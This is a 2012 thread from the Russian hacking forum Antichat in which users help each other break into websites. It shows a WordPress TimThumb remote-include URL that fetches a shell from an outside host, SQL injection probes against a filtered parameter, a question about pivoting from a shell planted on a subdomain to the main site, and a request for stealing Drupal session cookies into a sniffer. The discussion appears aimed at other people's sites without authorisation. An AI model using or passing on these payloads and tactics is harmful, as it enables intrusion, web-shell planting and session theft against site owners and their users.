ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.06.2012, 02:29
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
.htaccess решает проблему если повезет с правами.
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
13.06.2012, 10:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от promarketing
promarketing said:
Word press TimThumb Уязвимость
/wp-content/themes/theme/scripts/timthumb.php?src=http://blogger.com.site.com/shell.php (или shell.php4 shell.php%00) даёт error 503 Service temporary unavailable
Всё остальное успешно инклудится и появляется в cache папке - shell.php%20 shell.gif но не работает как php файл
Есть решение? вроде возможно т.к пару чужих .php файлов в папке cache уже есть
Ахах, бро. А ты уверен, что шелл на твоем сервере не выполняется, а выдает соурс?
|
|
|
|
13.06.2012, 13:53
|
|
Новичок
Регистрация: 04.10.2009
Сообщений: 10
Провел на форуме:
58602
Репутация:
1
|
|
Сообщение от promarketing
promarketing said:
Word press TimThumb Уязвимость
/wp-content/themes/theme/scripts/timthumb.php?src=http://blogger.com.site.com/shell.php (или shell.php4 shell.php%00) даёт error 503 Service temporary unavailable
Всё остальное успешно инклудится и появляется в cache папке - shell.php%20 shell.gif но не работает как php файл
Есть решение? вроде возможно т.к пару чужих .php файлов в папке cache уже есть
Тебе нужен не выполненный php скрипт, а сорцы т.е. ты когда заходишь на http://site.com/index.php , где index.php содержит :
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
ты видишь слово "привет", т.е. результат скрипта, а не сорцы => попробуй :
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]wp[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]themes[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]theme[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]scripts[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]timthumb[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]src[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//blogger.com.site.com/shell.txt[/COLOR][/COLOR]
Или нужно, чтоб у тебя в настройках http://blogger.com.site.com/ не исполнялиь php-скрипты (другой хостинг, типа narod.ru)
Другими словами если ты зайдешь на http://site.narod.ru/index.php , с тем же содержанием ты увидишь не исполненный скрипт, а собственно сорцы:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
|
|
|
|
13.06.2012, 14:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Друг, ниочем написал. Где ты видел такое:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
???
Надо в кавычки брать =)) |
|
|
|
13.06.2012, 14:31
|
|
Новичок
Регистрация: 04.10.2009
Сообщений: 10
Провел на форуме:
58602
Репутация:
1
|
|
Сообщение от Ereee
Ereee said:
Друг, ниочем написал. Где ты видел такое:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
???
Надо в кавычки брать =)) одно слово и без кавычек работает...
а ниочем это для тебя, т.к. ты это знаешь, а для того кто не знает нужно описывать подробно, чтоб понятно было с примерами... хотя может и дурацкими
|
|
|
|
13.06.2012, 15:36
|
|
Новичок
Регистрация: 21.12.2009
Сообщений: 0
Провел на форуме:
15756
Репутация:
0
|
|
Сообщение от Sidarovich1975
Sidarovich1975 said:
Тебе нужен не выполненный php скрипт, а сорцы т.е. ты когда заходишь на http://site.com/index.php , где index.php содержит :
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
ты видишь слово "привет", т.е. результат скрипта, а не сорцы => попробуй :
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]wp[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]themes[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]theme[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]scripts[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]timthumb[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]src[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//blogger.com.site.com/shell.txt[/COLOR][/COLOR]
Или нужно, чтоб у тебя в настройках http://blogger.com.site.com/ не исполнялиь php-скрипты (другой хостинг, типа narod.ru)
Другими словами если ты зайдешь на http://site.narod.ru/index.php , с тем же содержанием ты увидишь не исполненный скрипт, а собственно сорцы:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
Если уж ты даёшь советы, да ещё даёшь советы тем кто даёт советы о том как правильно давать советы, посмотри на вопрос : " Word press TimThumb"
Если ты понятия не имеешь о чём речь, зачем твои советы по поводу народа и .txt расширения, да ещё рассуждения о том как нужно советовать?
|
|
|
|
16.06.2012, 02:47
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125
Репутация:
3
|
|
/index.php?artid=30 and 1=2 - ошибко
/index.php?artid=30 and 1=1 - норм
/index.php?artid=30 select - нормал
/index.php?artid=30 UniON - страничка пугалка а.к.а "за вамы уже выехали"
остается тока крутить как блинд? отчета об ошибки нету
|
|
|
|
16.06.2012, 03:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
45743
Репутация:
0
|
|
залил все таки шелл на поддомен, все ок, но возникла проблема. сайт на другом ипе, основной. можно ли через поддомен пробраться к сайту?
|
|
|
|
17.06.2012, 12:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
3679
Репутация:
0
|
|
Есть сайт на Drupal.Раньше спокойно приходили куки, но после его обновления перестало приходить id сессии вида "SESSd9cc53338c9b7991787e099f00cbe150"-к примеру.
Знаю что дело не в сниффере ибо при вводе javascript:alert(document.cookie) id тоже нет
Зато сессию можно просмотреть в куках браузера
И как же мне получить эту сессию на сниффер??Сорри на нубство
|
|
|
|
17.06.2012, 12:56
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от Metho
Metho said:
залил все таки шелл на поддомен, все ок, но возникла проблема. сайт на другом ипе, основной. можно ли через поддомен пробраться к сайту?
Возможно что основной сайт написан на том что и сайт на поддомене, если залил шелл попробуй поискать баги в коде и применить их на основном домине, у меня бывали такие случии что прокатывало...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
